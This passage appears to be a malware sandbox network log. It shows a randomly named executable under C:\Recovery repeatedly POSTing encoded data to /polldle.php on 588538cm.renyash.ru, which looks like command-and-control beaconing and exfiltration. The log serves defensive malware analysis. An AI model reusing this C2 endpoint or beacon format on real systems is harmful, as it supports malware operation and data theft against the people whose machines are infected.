                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4111&min_rtt=1480&rtt_var=5818&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=64790&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                34          192.168.2.4  49904        104.21.38.84    80                8604  C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:33:23.888215065 CET  319                OUT        POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:24.239311934 CET  2504               OUT
                                                                                Jan 11, 2025 23:33:24.341195107 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:24.577214956 CET  811                IN         HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6m7C68TGR1%2BdVI8tpjO%2FRSD8DYRln89%2BUkN1AE6MpAzN0C0hIDVwaOKXL3KmBedOpOVLWkQthUa7Wn6zgpckirrzB7i%2FeKJ8GJv%2FkKjp2%2Frw9hepWN1VUbFscsUzReIYKL6EUcp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e46dd88433f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8194&min_rtt=1785&rtt_var=13487&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=27517&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                35          192.168.2.4  49913        104.21.38.84    80                8604  C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:33:24.711364031 CET  319                OUT        POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:25.067357063 CET  2504               OUT
                                                                                Jan 11, 2025 23:33:25.152148008 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:25.411586046 CET  807                IN         HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o57KXGLCRh8wdBXqgXgLzXw1UM2YMQXjyv%2B3PBhXgYKDovawo9p84T1iKopVP8c%2Fi5LxsigIYtu%2FMrz57TJzA48JEs2XzTXbF6zVlkrW7WPZQaAPYV7Hb%2B03G0mkquy4BFX42eUZ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e4bfed81a13-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2795&min_rtt=1991&rtt_var=2355&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=173273&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                36          192.168.2.4  49919        104.21.38.84    80                8604  C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:33:25.542560101 CET  319                OUT        POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:25.895539045 CET  2504               OUT
                                                                                Jan 11, 2025 23:33:25.987567902 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:26.227425098 CET  806                IN         HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StlWOufJki285L713t4Thjt9ldzRDnptQNvs0T%2FBUop9Sk5Cogz0lY%2BYQtWQxokXJBkwtajQ%2BGxb3IdcdyyRTjXGRGfHxj5nAuuCxmZJGJwVxwlfC2fWP8D7O9%2BcZdSjCZPuLYMn"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e51297d426b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3985&min_rtt=2406&rtt_var=4060&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=97087&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                37          192.168.2.4  49920        104.21.38.84    80                8604  C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:33:26.601970911 CET  319                OUT        POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                38          192.168.2.4  49926        104.21.38.84    80                8604  C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp                            Bytes transferred  Direction  Data
                                                                                Jan 11, 2025 23:33:26.902194977 CET  319                OUT        POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1608
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:27.254817963 CET  1608               OUT
                                                                                Jan 11, 2025 23:33:27.354954958 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:27.601699114 CET  957                IN         HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1VhDhew5t7FlVzezjaZgd8ZQi0OHjxZWaatfAcFjZZLkcSKq%2FGm8K8GcnXSNSDaBDIUEYazbE1tj9azoVr4RC1r%2F0AGc49ESdD%2BFPQx%2FGJS%2FdowunHDCocrQH6BRi2TqwZystfB"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e59be16efa1-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4697&min_rtt=1958&rtt_var=6212&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1927&delivery_rate=61159&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 56 26 34 30 1e 2a 29 05 58 2e 16 3f 5b 2d 08 3c 5a 29 21 3a 5b 22 29 30 5c 26 0b 34 51 3c 03 21 45 2b 03 33 54 37 3d 22 1c 26 03 23 46 0c 1d 22 59 3e 01 27 08 31 02 30 5a 28 0d 29 01 26 0b 30 09 2a 37 2f 50 2a 3a 2a 00 22 5a 22 52 3f 21 39 18 28 36 2a 5b 3b 31 23 13 26 00 2e 51 0f 16 22 0d 36 0f 2f 01 34 5b 3b 5d 25 30 0d 1c 28 34 28 58 25 3a 0a 1b 3f 0d 04 5e 3c 31 3c 54 24 5b 3f 54 32 01 26 5d 3c 39 0a 0e 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.V&40*)X.?[-<Z)!:[")0\&4Q<!E+3T7="&#F"Y>'10Z()&0*7/P*:*"Z"R?!9(6*[;1#&.Q"6/4[;]%0(4(X%:?^<1<T$[?T2&]<9?;$\#(V?[M0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49927 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:33:27.022962093 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:33:27.379795074 CET | 2504 | OUT | Data Raw: 58 51 51 50 5a 43 5a 5d 54 5d 55 5a 50 55 59 5e 50 56 5a 52 57 57 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQQPZCZ]T]UZPUY^PVZRWWPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- .E$(%"]3<1W %X/+X??2)94$"1'](5#X'/\/
Jan 11, 2025 23:33:27.485744953 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:33:27.726777077 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R977o76D1x1hIKJZINH6C91WG3JN%2FwjKMOpKKAN7SmIEzogOy7yZT4NcI1PYRls4wDmiMJlh9zxocN0xLpw2kmR3Bc61FqOJa0je%2B%2BIXz%2BLlF1b%2BslKMErvTNIhpNh089lVjNlNV"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e5a895d78e1-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4308&min_rtt=2022&rtt_var=5331&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=71871&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49933 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:33:27.862638950 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
Jan 11, 2025 23:33:28.208184004 CET | 2504 | OUT | Data Raw: 58 50 54 50 5a 45 5a 5a 54 5d 55 5a 50 5a 59 5c 50 5d 5a 5c 57 51 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPTPZEZZT]UZPZY\P]Z\WQPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,3!1($!%Y'" />-(?Z<#232U.$7623](#X'/\/<
Jan 11, 2025 23:33:28.327708006 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:33:28.492438078 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ZTMgSoYxdblr1TZHGdvIOWu3wLucmghba%2F%2FYIhK0qDXc%2B8zGjTpT%2Fk7C%2BhzL7HBSoQa6JRzxcW7dKTb38Tb%2BkQlx6oB8fhKfxgyyL7wTridlomXJeuzC6XT4oHX5kCpRtAkPBPp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e5fc93c7d18-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4570&min_rtt=2000&rtt_var=5891&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=64696&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49939 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:33:28.654609919 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:33:29.010983944 CET | 2504 | OUT | Data Raw: 5d 5e 51 52 5a 47 5f 5f 54 5d 55 5a 50 5e 59 5f 50 52 5a 53 57 52 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QRZG__T]UZP^Y_PRZSWRP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-052&=]$7,)X;?<<+%32.462++#X'/\/,
Jan 11, 2025 23:33:29.106998920 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:33:29.346067905 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:29 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ni7hcf3pXqN0R3%2BvRzx005f6GSFkwVHIcBzxnDyU5ozGKOrvTTG5oDmL7rfChQsvVurVDV5nG7XKGst1CFqW9%2BKLQnaHm%2FAAX%2FmT806JkZ28g5I1hcGL0Cgu42D9SUbU4mbXelUG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e64ac4b43d5-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4253&min_rtt=1746&rtt_var=5669&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=66960&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49940 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:33:29.484366894 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:33:29.832988977 CET | 2504 | OUT | Data Raw: 5d 5e 51 55 5a 40 5a 5f 54 5d 55 5a 50 59 59 5f 50 5c 5a 5e 57 51 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QUZ@Z_T]UZPYY_P\Z^WQP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F.@%8123<) 1Z8(313%94[6"+%#X'/\/0
Jan 11, 2025 23:33:29.937923908 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:33:30.204200029 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2FGVUsT1jcoKEQzTy7herYZ7GS2Gxz00zSvrDOsuCKR1iTehAW4r8qGjUtCff2mETCMIi3N4V9LKEFFZZRuOqyELBKlxCkDfZgGYEOjdAbfzB4RrpG%2FT44YytGPGAH9fSyTqi6iJ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e69d94543ee-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7827&min_rtt=1735&rtt_var=12836&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=28923&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49947 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:33:30.392554045 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:33:30.739222050 CET | 2504 | OUT | Data Raw: 5d 5e 51 54 5a 46 5a 51 54 5d 55 5a 50 5f 59 5d 50 52 5a 5f 57 5d 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QTZFZQT]UZP_Y]PRZ_W]P_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.3-2$"9_%/9S7,5Y8$<+& 2.#5T3X*%#X'/\/(
Jan 11, 2025 23:33:30.851397991 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:33:31.015234947 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sYOw9NVuCpeuTdBp3ap%2FTGFvLhnSkAupqBAKVyiQ2b6BLOCNVXFrZRoscQNwoqmMG2Ny5c%2Fpw1y6CSU5pe73HTH6OBCpDPyz5q2pA4au9scuQBKWe32IHFxGPfEaFcoivbWbgKKL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e6f8af24350-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3204&min_rtt=1765&rtt_var=3540&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=109948&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49955 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 23:33:31.150085926 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
Jan 11, 2025 23:33:31.504878998 CET | 2504 | OUT | Data Raw: 5d 59 54 51 5f 45 5a 5d 54 5d 55 5a 50 5a 59 5d 50 54 5a 59 57 57 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTQ_EZ]T]UZPZY]PTZYWWPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -U5&(8&2\$2#9Y8'Y(/ $#-.3#2+5#X'/\/<
Jan 11, 2025 23:33:31.599276066 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 23:33:31.761110067 CET | 791 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uqJrAWu6Jt9Pwhd443MYS8CNMPNg%2BSq4UqjlduRnk8J26NuTklGZAzYDLsRtbBzxM63z7i3smVjP7pQX7hpWu8%2F2wT5K3uOOjuEjHZju21HCrjM7lvALlmFSfjHA5lEAvzY%2BiQ6l"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085e743d0241ef-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2986&min_rtt=1682&rtt_var=3239&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=120481&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 23:33:31.847834110 CET | 14 | IN | Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
